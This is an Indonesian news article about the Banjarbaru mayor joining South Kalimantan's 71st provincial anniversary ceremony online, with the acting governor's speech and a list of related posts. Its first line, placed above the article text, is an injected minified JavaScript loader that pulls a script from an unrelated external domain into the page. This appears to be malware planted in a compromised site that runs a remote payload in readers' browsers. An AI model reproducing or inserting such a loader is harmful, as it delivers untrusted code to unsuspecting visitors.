(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Wali Kota Banjarbaru Ikuti Peringatan Harjad 71 Kalsel Secara Virtual


KANALKALIMANTAN.COM, BANJARBARU – Wali Kota Banjarbaru Aditya Mufti Ariffin mengikuti acara peringatan Hari Jadi Ke-71 Provinsi Kalimantan Selatan secara virtual, Sabtu (14/7/2021), di ruang tamu utama Wali Kota Banjarbaru.

Selain Wali Kota juga hadir Ketua DPRD Banjarbaru Fadliansyah, Dandim 1006/Banjar Letkol Inf Imam Muchtarom, Wakapolres Banjarbaru Kompol Boma Wedhayanto Purnomo, Kepala Kejaksaan Negeri Banjarbaru Adri Irawan SH MH. Sementara Kepala SKPD mengikuti melalui masing-masing kantor.

Penjabat (Pj) Gubernur Kalsel Safrizal ZA atas nama Pemerintah Provinsi Kalimantan Selatan, mengucapkan selamat memperingati Hari Jadi ke-71, kepada seluruh lapisan masyarakat Kalimantan Selatan.

“Mudah-mudahan, peringatan hari jadi ini menjadi momentum untuk meningkatkan semangat persatuan, persaudaraan dan kegotongroyongan dalam membangun Banua, sekaligus semangat kepedulian untuk berjuang bersama dalam menangani pandemi Covid-19 di Kalimantan Selatan,” ujarnya.

 

 

Baca juga: Taman Budaya Kalsel Gelar “Semarak Topeng” 71

“Kita masih belum bisa keluar dari pandemi Covid-19. Ini tahun kedua kita melaksanakan peringatan hari jadi dengan cara yang sederhana dan terbatas,” katanya.

Berbagai kegiatan yang biasanya merangkai Hari Jadi Provinsi Kalimantan Selatan ditiadakan. Semua itu dilakukan untuk mencegah dan menghindari penularan Covid-19.

Meskipun peringatan hari jadi provinsi yang ke 71 ini secara sederhana dan terbatas, namun makna, kesan dan pesan dari peringatan ini tetap dirasakan, khususnya makna dan pesan kesyukuran atas keberhasilan Provinsi Kalimantan Selatan dalam melaksanakan pembangunan secara berkelanjutan. “Poin kesyukuran ini adalah nilai tertingi dan substansi utama dari kesan hari jadi yang kita peringati. Dengan bersyukur inilah, Allah SWT akan menambah nikmat dan anugerahnya di Kalimantan Selatan, karena inilah janji Allah bagi orang-orang yang bersyukur atas pemberiannya,” bebernya.

“Mari kita maknai tema Rukui Hajat, Gawi Basumangat, Banua Harat, sebagai spirit kita untuk menyongsong perjalanan Provinsi Kalimantan Selatan yang lebih maju, lebih baik, lebih sejahtera, serta kehidupan rakyat yang berkemakmuran. Dirgahayu ke-71 Provinsi Kalimantan Selatan, semoga Allah SWT senantiasa memberkahi dengan kemakmuran dan kedamaian,” pungkasnya. (kanalkalimantan.com/al)

Reporter : al
Editor : kk


Risa

Recent Posts

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

5 menit ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

16 menit ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

4 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

6 jam ago

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

7 jam ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

7 jam ago

This website uses cookies.